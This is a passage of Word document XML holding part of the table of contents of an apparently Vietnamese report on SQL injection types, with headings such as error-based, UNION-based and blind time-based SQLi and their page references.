                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46668C90" w14:textId="7023DBAF" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895593" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1. InBand attack</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895593 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="672B5072" w14:textId="0C324D58" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895594" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.2. Cơ chế tấn công</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895594 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03BA00FB" w14:textId="758FB576" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895595" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Error-based SQLi:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895595 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11C44F50" w14:textId="0A67913F" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895596" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.Union-based SQLi:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895596 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33237765" w14:textId="5E55EB2D" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895597" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.3. Các khai thác</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895597 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="72A83488" w14:textId="7E54BF61" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895598" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.Error-based SQLi:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895598 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39F43340" w14:textId="0973D820" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895599" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.UNION-based SQLi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895599 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="685F032D" w14:textId="7EB3E1A5" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC5"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895600" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1.Xác định số lượng cột cần thiết trong cuộc tấn công UNION SQLi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895600 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2009C8E4" w14:textId="66BC1BCA" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC5"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895601" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>2.2. Tìm các cột có thông tin hữu ích trong tấn công UNION SQLi</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895601 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="326C89C0" w14:textId="2A59BC35" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895602" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.Blind SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895602 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08ED6A10" w14:textId="516C0E1D" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895603" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.1. Giới thiệu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895603 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="170A9D17" w14:textId="30D07FB5" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895604" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.2.Cơ chế hoạt động</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895604 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0D393474" w14:textId="41DB3BFA" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895605" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.Dạng Content-Based</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895605 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="669E0959" w14:textId="5D85B6B6" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895606" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Time-Based</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895606 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57D998E9" w14:textId="240A6038" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895607" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2.3.Cách khai thác</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895607 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="51CC0CF8" w14:textId="7B5F656C" w:rsidR="00357678" w:rsidRDefault="00357678">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc42895608" w:history="1">
            <w:r w:rsidRPr="00970A41">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Content-Based</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc42895608 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
